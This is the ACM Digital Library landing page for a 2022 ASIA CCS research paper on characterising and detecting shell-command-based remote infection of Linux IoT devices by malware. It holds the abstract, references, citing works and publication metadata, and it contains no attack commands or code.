skip to main content
10.1145/3488932.3517423acmconferencesArticle/Chapter ViewAbstractPublication Pagesasia-ccsConference Proceedingsconference-collections
research-article
Public Access

Understanding and Detecting Remote Infection on Linux-based IoT Devices

Published: 30 May 2022 Publication History

Abstract

The rocketed population, poor security, and 24/7 online properties make Linux-based Internet of Things (IoT) devices ideal targets for attackers. However, due to the budget constraints and an enormous number of vulnerabilities on such devices, protecting them against attacks is very challenging. Therefore, understanding and detecting IoT malware remote infection, which is before the compromised IoT devices are monetized by adversaries, is crucial to mitigate damages and financial loss caused by IoT malware. In this paper, we conduct an empirical study on a large-scale dataset covering 403,464 samples collected from VirusShare and a large group of IoT honeypots to gain a deep insight into the characteristics of IoT malware remote infection. We share detailed statistics of shell commands found in our dataset, highlight malicious behaviors performed through those commands, investigate current states of fingerprinting methods of those commands, and offer a taxonomy of shell commands by introducing the notion of infection capability. To demonstrate the usefulness of the knowledge gained from our study, we develop an approach to detect ongoing remote infection activities based on infection capabilities. Our evaluation shows that our detection approach can achieve a 99.22% detection rate for remote infections in the wild and introduce small performance overhead.

Supplementary Material

MP4 File (ASIA-CCS22-fp435.mp4)
Presentation video

References

[1]
Yousra Aafer, Wenliang Du, and Heng Yin. 2013. Droidapiminer: Mining api-level features for robust malware detection in android. In International conference on security and privacy in communication systems. Springer, 86--103.
[2]
Muhamed Fauzi Bin Abbas and Thambipillai Srikanthan. 2017. Low-complexity signature-based Malware detection for IoT devices. In International Conference on Applications and Techniques in Information Security. Springer, 181--189.
[3]
Akamai. 2016. Akamai's State of the Internet / Security, Q3 2016 Report. https://www.akamai.com/us/en/multimedia/documents/state-of-theinternet/q3--2016-state-of-the-internet-security-report.pdf.
[4]
Hisham Alasmary, Afsah Anwar, Ahmed Abusnaina, Abdulrahman Alabduljabbar, Mohammed Abuhamad, An Wang, Dae Hun Nyang, Amro Awad, and David Mohaisen. 2021. SHELLCORE: Automating Malicious IoT Software Detection Using Shell Commands Representation. IEEE Internet of Things Journal (2021).
[5]
Omar Alrawi, Charles Lever, Kevin Valakuzhy, Kevin Snow, Fabian Monrose, Manos Antonakakis, et al. 2021. The Circle Of Life: A Large-Scale Study of The IoT Malware Lifecycle. In 30th {USENIX} Security Symposium ({USENIX} Security 21).
[6]
Manos Antonakakis, Tim April, Michael Bailey, Matt Bernhard, Elie Bursztein, Jaime Cochran, Zakir Durumeric, J Alex Halderman, Luca Invernizzi, Michalis Kallitsis, et al. 2017. Understanding the mirai botnet. In 26th {USENIX} Security Symposium ({USENIX} Security 17). 1093--1110.
[7]
Bashlex 2021. Bashlex - Python parser for bash. https://github.com/idank/bashlex.
[8]
Dominik Breitenbacher, Ivan Homoliak, Yan Lin Aung, Nils Ole Tippenhauer, and Yuval Elovici. 2019. HADES-IoT: A Practical Host-Based Anomaly Detection System for IoT Devices. In ACM Asia Conference on Computer and Communications Security. 479--484.
[9]
Eric Brown. 2018. Linux Still Rules IoT, Says Survey, with Raspbian Leading the Way. https://circuitcellar.com/cc-blog/linux-still-rules-iot-says-survey-withraspbian-leading-the-way/.
[10]
Edmund K Burke and Yuri Bykov. 2017. The late acceptance hill-climbing heuristic. European Journal of Operational Research 258, 1 (2017), 70--78.
[11]
Busybox man pages - user commands 2021. Busybox man pages - user commands. https://busybox.net/downloads/BusyBox.html.
[12]
Daming D Chen, Maverick Woo, David Brumley, and Manuel Egele. 2016. Towards Automated Dynamic Analysis for Linux-based Embedded Firmware. In NDSS, Vol. 16. 1--16.
[13]
Andrei Costin and Jonas Zaddach. 2018. Iot malware: Comprehensive survey, analysis framework and case studies. BlackHat USA (2018).
[14]
Emanuele Cozzi, Mariano Graziano, Yanick Fratantonio, and Davide Balzarotti. 2018. Understanding linux malware. In 2018 IEEE Symposium on Security and Privacy (SP). IEEE, 161--175.
[15]
Fan Dang, Zhenhua Li, Yunhao Liu, Ennan Zhai, Qi Alfred Chen, Tianyin Xu, Yan Chen, and Jingyu Yang. 2019. Understanding Fileless Attacks on Linux-based IoT Devices with HoneyCloud. In 17th Annual International Conference on Mobile Systems, Applications, and Services. 482?493.
[16]
Fei Ding, Hongda Li, Feng Luo, Hongxin Hu, Long Cheng, Hai Xiao, and Rong Ge. 2020. DeepPower: Non-intrusive and Deep Learning-based Detection of IoT Malware Using Power Side Channels. In Proceedings of the 15th ACM Asia Conference on Computer and Communications Security. 33--46.
[17]
Thomas Dube, Richard Raines, Gilbert Peterson, Kenneth Bauer, Michael Grimaila, and Steven Rogers. 2012. Malware target recognition via static heuristics. Computers & Security 31, 1 (2012), 137--147.
[18]
Dyn. 2016. Dyn analysis summary of Friday October 21 attack. https://dyn.com/blog/dyn-analysis-summary-of-friday-october-21-attack/.
[19]
Peter Ferrie. 2007. Attacks on more virtual machine emulators. Symantec Technology Exchange 55 (2007).
[20]
firmwalker 2017. firmwalker. https://github.com/danieluhricek/LiSa.
[21]
firmware-mod-kit 2017. firmware-mod-kit. https://github.com/rampageX/firmware-mod-kit.
[22]
Neil J. Gunther. 2010. UNIX Load Average Part 1: How It Works. https://www.helpsystems.com/resources/guides/unix-load-average-part1-how-it-works.
[23]
Michael Haag. 2013. Kaiten - Linux Backdoor. http://blog.michaelhaag.org/2013/12/kaiten-linux-backdoor.html.
[24]
Danny Hendler, Shay Kels, and Amir Rubin. 2018. Detecting malicious PowerShell commands using deep neural networks. In Asia Conference on Computer and Communications Security. 187--197.
[25]
Here Document 2021. Here Document. https://en.wikipedia.org/wiki/Here_document.
[26]
Stephen Herwig, Katura Harvey, George Hughey, Richard Roberts, and Dave Levin. 2019. Measurement and Analysis of Hajime, a Peer-to-peer IoT Botnet. In NDSS.
[27]
Ivan Homoliak, Martin Teknos, Martín Ochoa, Dominik Breitenbacher, Saeid Hosseini, and Petr Hanacek. 2018. Improving network intrusion detection classifiers by non-payload-based exploit-independent obfuscations: An adversarial approach. arXiv preprint arXiv:1805.02684 (2018).
[28]
Íñigo Íncer Romeo, Michael Theodorides, Sadia Afroz, and David Wagner. 2018. Adversarially robust malware detection using monotonic classification. In ACM International Workshop on Security and Privacy Analytics. 54--63.
[29]
Rhena Inocencio. 2014. BASHLITE Affects Devices Running on BusyBox. http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affectsdevices-running-on-busybox/.
[30]
Bo Li, Kevin Roundy, Chris Gates, and Yevgeniy Vorobeychik. 2017. Large-scale identification of malicious singleton files. In ACM on Conference on Data and Application Security and Privacy. 227--238.
[31]
Libelium. 2014. Top 50 Internet of Things Application. http://www.libelium.com/resources/ top_50_iot_sensor_applications_ranking/.
[32]
LightSensor-daemon 2021. LightSensor-daemon for OpenWrt. http://www.aboehler.at/hg/lightSensor-daemon.
[33]
David Lindner. 2018. OWASP Internet Of Things Top 10 2018 Released. https://nvisium.com/blog/2019/01/02/internet-of-things-owasp-top-10- 2018-released.html.
[34]
Linux man pages - user commands 2021. Linux man pages - user commands. https://linux.die.net/man/1/.
[35]
Robert Lyda and James Hamrock. 2007. Using entropy analysis to find encrypted and packed malware. IEEE Security & Privacy 5, 2 (2007), 40--15.
[36]
Enrico Mariconti, Lucky Onwuzurike, Panagiotis Andriotis, Emiliano De Cristofaro, Gordon Ross, and Gianluca Stringhini. 2017. MAMADROID: Detecting Android Malware by Building Markov Chains of Behavioral Models. (2017).
[37]
Vladimir Kuskov Mikhail Kuzin, Yaroslav Shmelev. 2018. New IoT-malware grew three-fold in H1 2018. https://securelist.com/new-trends-in-the-world-of-iotthreats/87991/.
[38]
Brad Miller, Alex Kantchelian, Michael Carl Tschantz, Sadia Afroz, Rekha Bachwani, Riyaz Faizullabhoy, Ling Huang, Vaishaal Shankar, Tony Wu, George Yiu, et al. 2016. Reviewer integration and performance measurement for malware detection. In International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment. Springer, 122-141.
[39]
Bradley Austin Miller. 2015. Scalable platform for malicious content detection integrating machine learning and manual review. Ph. D. Dissertation. UC Berkeley.
[40]
Mirai Source code 2016. Leaked Mirai Source Code for Research/IoC Development Purposes. https://github.com/jgamblin/Mirai-Source-Code.
[41]
MJPGStreamer 2021. MJPG Streamer for OpenWrt. https://openwrt.org/packages/pkgdata/mjpg-streamer.
[42]
Motion 2021. The Motion program. https://motion-project.github.io/index.html.
[43]
Thien Duc Nguyen, Samuel Marchal, Markus Miettinen, Hossein Fereidooni, N Asokan, and Ahmad-Reza Sadeghi. 2019. DÏoT: A federated self-learning anomaly detection system for IoT. In 2019 IEEE 39th International Conference on Distributed Computing Systems (ICDCS). IEEE, 756--767.
[44]
OpenWrt Project 2021. OpenWrt Porject. https://openwrt.org/.
[45]
Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, Tsutomu Matsumoto, Takahiro Kasama, and Christian Rossow. 2015. IoTPOT: analysing the rise of IoT compromises. In 9th USENIX Workshop on Offensive Technologies (WOOT'15).
[46]
Thomas Raffetseder, Christopher Kruegel, and Engin Kirda. 2007. Detecting system emulators. In International Conference on Information Security. Springer, 1--18.
[47]
Raspbian OS 2021. Raspberry Pi OS (previously called Raspbian). https://www.raspberrypi.org/downloads/raspberry-pi-os/.
[48]
Rsyslog: rocket-fast system for log processing 2021. Rsyslog. https://en.wikipedia.org/wiki/Rsyslog.
[49]
M Zubair Shafiq, S Momina Tabish, Fauzan Mirza, and Muddassar Farooq. 2009. Pe-miner: Mining structural information to detect malicious executables in realtime. In International Workshop on Recent Advances in Intrusion Detection. Springer, 121--141.
[50]
Miroslav Stampar. 2021. IPsum Threat Intelligence. https://github.com/stamparm/ipsum.
[51]
Miroslav Stampar. 2021. Maltrail Malicious Traffic Detection System. https://github.com/stamparm/maltrail.
[52]
Jiawei Su, Vargas Danilo Vasconcellos, Sanjiva Prasad, Sgandurra Daniele, Yaokai Feng, and Kouichi Sakurai. 2018. Lightweight classification of IoT malware based on image recognition. In 2018 IEEE 42nd Annual Computer Software and Applications Conference (COMPSAC), Vol. 2. IEEE, 664--669.
[53]
Hao Sun, Xiaofeng Wang, Rajkumar Buyya, and Jinshu Su. 2017. CloudEyes: Cloud-based malware detection with reversible sketch for resource-constrained internet of things IoT devices. SoftwareÐPractice & Experience 47, 3 (2017), 421-441.
[54]
The networkx package 2021. NetworkX ? Network Analysis Package in Python. https://networkx.org/.
[55]
Pierre-Antoine Vervier and Yun Shen. 2018. Before toasters rise up: A view into the emerging iot threat landscape. In International Symposium on Research in Attacks, Intrusions, and Defenses. Springer, 556--576.
[56]
2021. Virustotal-free online virus, malware and url scanner. https://www.virustotal.com/en. (2021).
[57]
VirusShare.com 2021. VirusShare.com. https://virusshare.com/.
[58]
Wifatch source repository 2015. Linux.Wifatch. https://gitlab.com/rav7teif/linux.wifatch.
[59]
Mu Zhang, Yue Duan, Heng Yin, and Zhiruo Zhao. 2014. Semantics-aware android malware classification using weighted contextual api dependency graphs. In ACM SIGSAC conference on computer and communications security. 1105--1116.
[60]
Shuofei Zhu, Jianjun Shi, Limin Yang, Boqin Qin, Ziyi Zhang, Linhai Song, and Gang Wang. 2020. Measuring and modeling the label dynamics of online antimalware engines. In 29th USENIX Security Symposium (USENIX Security 20). 2361--2378.

Cited By

View all
  • (2024)Swarm Learning and Knowledge Distillation Empowered Self-Driving Detection Against Threat Behavior for Intelligent IoTIEEE Transactions on Mobile Computing10.1109/TMC.2023.333051423:6(7117-7134)Online publication date: Jun-2024
  • (2024)CMD: Co-Analyzed IoT Malware Detection and Forensics via Network and Hardware DomainsIEEE Transactions on Mobile Computing10.1109/TMC.2023.331101223:5(5589-5603)Online publication date: May-2024
  • (2024)TPE-Det: A Tamper-Proof External Detector via Hardware Traces Analysis Against IoT MalwareIEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems10.1109/TCAD.2024.344471243:11(3455-3466)Online publication date: Nov-2024
  • Show More Cited By

Index Terms

  1. Understanding and Detecting Remote Infection on Linux-based IoT Devices

      Recommendations

      Comments

      Information & Contributors

      Information

      Published In

      cover image ACM Conferences
      ASIA CCS '22: Proceedings of the 2022 ACM on Asia Conference on Computer and Communications Security
      May 2022
      1291 pages
      ISBN:9781450391405
      DOI:10.1145/3488932
      Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from [email protected]

      Sponsors

      Publisher

      Association for Computing Machinery

      New York, NY, United States

      Publication History

      Published: 30 May 2022

      Permissions

      Request permissions for this article.

      Check for updates

      Author Tags

      1. linux-based iot
      2. malware detection
      3. remote infection
      4. shell command

      Qualifiers

      • Research-article

      Funding Sources

      Conference

      ASIA CCS '22
      Sponsor:

      Acceptance Rates

      Overall Acceptance Rate 418 of 2,322 submissions, 18%

      Contributors

      Other Metrics

      Bibliometrics & Citations

      Bibliometrics

      Article Metrics

      • Downloads (Last 12 months)194
      • Downloads (Last 6 weeks)24
      Reflects downloads up to 25 Dec 2024

      Other Metrics

      Citations

      Cited By

      View all
      • (2024)Swarm Learning and Knowledge Distillation Empowered Self-Driving Detection Against Threat Behavior for Intelligent IoTIEEE Transactions on Mobile Computing10.1109/TMC.2023.333051423:6(7117-7134)Online publication date: Jun-2024
      • (2024)CMD: Co-Analyzed IoT Malware Detection and Forensics via Network and Hardware DomainsIEEE Transactions on Mobile Computing10.1109/TMC.2023.331101223:5(5589-5603)Online publication date: May-2024
      • (2024)TPE-Det: A Tamper-Proof External Detector via Hardware Traces Analysis Against IoT MalwareIEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems10.1109/TCAD.2024.344471243:11(3455-3466)Online publication date: Nov-2024
      • (2023)C2Store: C2 Server Profiles at Your FingertipsProceedings of the ACM on Networking10.1145/36291321:CoNEXT3(1-21)Online publication date: 28-Nov-2023

      View Options

      View options

      PDF

      View or Download as a PDF file.

      PDF

      eReader

      View online with eReader.

      eReader

      Login options

      Media

      Figures

      Other

      Tables

      Share

      Share

      Share this Publication link

      Share on social media